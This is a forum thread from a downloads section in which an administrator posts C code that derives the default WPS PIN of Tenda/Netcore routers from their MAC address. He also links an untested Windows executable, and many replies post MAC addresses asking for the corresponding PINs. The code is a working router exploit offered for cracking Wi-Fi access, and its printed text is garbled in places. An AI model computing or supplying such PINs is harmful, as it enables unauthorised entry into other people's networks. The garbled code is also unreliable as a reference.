Windows Tenda / Netcore Default WPS Algorithm

Discussion in 'Software Downloads' started by Mr. Penguin, 21 Jul 2012.

  1. Mr. Penguin

    Mr. Penguin Administrator
    Staff Member VIP Admin

    Joined:
    18 May 2012
    Messages:
    3,093
    Likes Received:
    1,262
    If your router starts with the following MAC addresses C8:3A:35, or 00:B0:0C software can be used to crack the default WPS pin. A user can directly draw the PIN key without the need for Reaver. This is a Windows executable.

    Vulnerable devices include Netcore NW705P, NW705S, NW705+, NW714, NW702, NW712, W150M and NW709.

    Source code download click here for the compressed package. I have not tested it nor can I deem this download safe or effective. I found this information at http://wifibeta.com/

    1a722eb5aeec3276e...3db3404g-3359a51.jpeg

    MD5: 512e588f9cb153109863892e124672f5

    Code:
    Select All
    / / Computes PIN code starts with the OUI "C83A35 and the" 00B00C " / / Both two OUIs which belonged to Tenda Technology Co., Ltd. are confirmed effectively. / / Coded by Zhaochunsheng - iBeini.com / / the Modified by Lingxi - WiFiBETA. COM # Include <stdio.h> # include <stdlib.h> int main () { unsigned int wps_pin_checksum (unsigned int pin); int PIN = 0; / / Printf ("ComputePIN-C83A35 \ n"); printf ("Description: \ n"); printf ("If your of wireless router MAC address start with \" C83A35 \ "or \" 00B00C \ ", \ n") ; printf ("type the other six digits, you might be able to get the \ n"); printf ("WPS-PIN of this equipment, please have a the try, good luck! \ n \ n"); printf (" Code by ZhaoChunsheng 04/07/2012 [URL='http://ibeini.com/n/n%22);'][COLOR=#8ba612]http://iBeini.com \ n \ n "); [/URL] printf ("the Modified by Lingxi - WiFiBETA.COM \ n \ n"); / / Translated TO Chinese of printf ("Note: \ n "); printf ("If your wireless router MAC address" C83A35 "or" 00B00C "starts with \ n"); printf ("enter the MAC address after six (not case-sensitive) you may be able to get the routing WPS PIN key! \ n "); printf ("I wish you good luck! \ n \ n"); printf ("write by Zhao Chunsheng on April 7, 2012 [URL='http://ibeini.com/n%22);']Http :/ / iBeini.com \ n " ); printf ("to modify Speaking WiFiBETA.COM Ling Xi \ n \ n"); printf ("Please enter the six MAC address (HEX): \ n"); printf ("the Input the last 6 digits of the MAC Address (HEX): "); the scanf ("% x", & PIN); printf ("You entered after six MAC address is% X \ n", the PIN); printf (the "Last 6 digits of the MAC Address (HEX ) are:% X \ n ", the PIN); printf ("WPS PIN is:% 07d% d \ n" PIN% 10 million, wps_pin_checksum (PIN% 10 million)); return 0; } unsigned int wps_pin_checksum (unsigned int pin) { unsigned int accum = 0; while (pin) { accum + = 3 * (pin% 10); pin / = 10; accum + = pin 10; pin / = 10; } return (10 - accum% 10)% 10; }
     

    Attached Files:

    • Agree Agree x 1
  2. D3M0N

    D3M0N Well-Known Member

    Joined:
    27 Jul 2012
    Messages:
    46
    Likes Received:
    35
  3. sylar little

    sylar little Member

    Joined:
    8 Nov 2012
    Messages:
    1
    Likes Received:
    0
    Is this working ? anyone try it ? Also can be done a tutorial how exactly to do that?
     
  4. jack aldacker

    jack aldacker Member

    Joined:
    6 Jan 2013
    Messages:
    1
    Likes Received:
    0
    sorry not working for me and i have tenda router :mad:(
     
  5. GeekDeveloper

    GeekDeveloper Active Member

    Joined:
    21 Dec 2013
    Messages:
    31
    Likes Received:
    2
    Send me your generated pin and send you back the correct pin.
     
  6. Mr. Penguin

    Mr. Penguin Administrator
    Staff Member VIP Admin

    Joined:
    18 May 2012
    Messages:
    3,093
    Likes Received:
    1,262
  7. make333000

    make333000 Member

    Joined:
    21 Aug 2014
    Messages:
    3
    Likes Received:
    0
    tenda C8:3A:35:56:94:E9
    pin?
     
  8. meknb

    meknb Mod
    Moderator Dev Team VIP

    Joined:
    2 Jun 2012
    Messages:
    702
    Likes Received:
    202
    There is a program in the fist post, If you can't be arsed trying it we don't know if it works.
     
  9. alecalex

    alecalex Active Member

    Joined:
    27 Oct 2012
    Messages:
    2
    Likes Received:
    0
    C8:3A:35:50:59:40 Tenda_505940

    Please help me with the pin
     
  10. Mohit Saud

    Mohit Saud Active Member

    Joined:
    29 Mar 2015
    Messages:
    1
    Likes Received:
    0
    calculate the wps pin of C8:3A:35:56:94:E8 you will get the wps pin working for C8:3A:35:56:94:E9
    --- Double Post Merged, 25 Apr 2015, Original Post Date: 25 Apr 2015 ---
    The above algorithm sucks.One of my friends has found an algorithm and it really works for Tenda Router.If the mac address is c8:3a:35:1d:14:39 then find the wps pin for c8:3a:35:1d:14:38.This really works for c8:3a:35:1d:14:39.Thanks to his idea.This is the wps pin algorithm for Tenda router.Thank you.
     
  11. Can anyone help me with this mac C8-3A-35-35-87-F1
    --- Double Post Merged, 9 May 2015, Original Post Date: 9 May 2015 ---
    The generator calculated the wrong pin
     
  12. eagleeyez

    eagleeyez Active Member

    Joined:
    17 Nov 2015
    Messages:
    1
    Likes Received:
    0
    anyone can help with this one please 08:14:38 this generated pin don't work 05294640
     
  13. Asian

    Asian Active Member

    Joined:
    19 Jan 2016
    Messages:
    26
    Likes Received:
    21
    [BCOLOR=rgb(250, 250, 250)]Can anyone help with [/BCOLOR]C8:3A:35:6A:75:39
    [BCOLOR=rgb(250, 250, 250)]These generated pins didn't work: [/BCOLOR]69768255 & 69768248
     
  14. Hardik369

    Hardik369 New Member

    Joined:
    29 Oct 2016
    Messages:
    1
    Likes Received:
    0
    Tenda WPS pin for C8:3A:35:5D:F1:78? FAST! PLZZ!!
     
  15. Devansh

    Devansh New Member

    Joined:
    7 Oct 2017
    Messages:
    1
    Likes Received:
    0
    My mac is 04:8D:39:2C:66:5D
    Generated Pin is 29097890 which is not working....
    Please send me correct pin.
    Email id- [email protected]
     

Share This Page

Loading...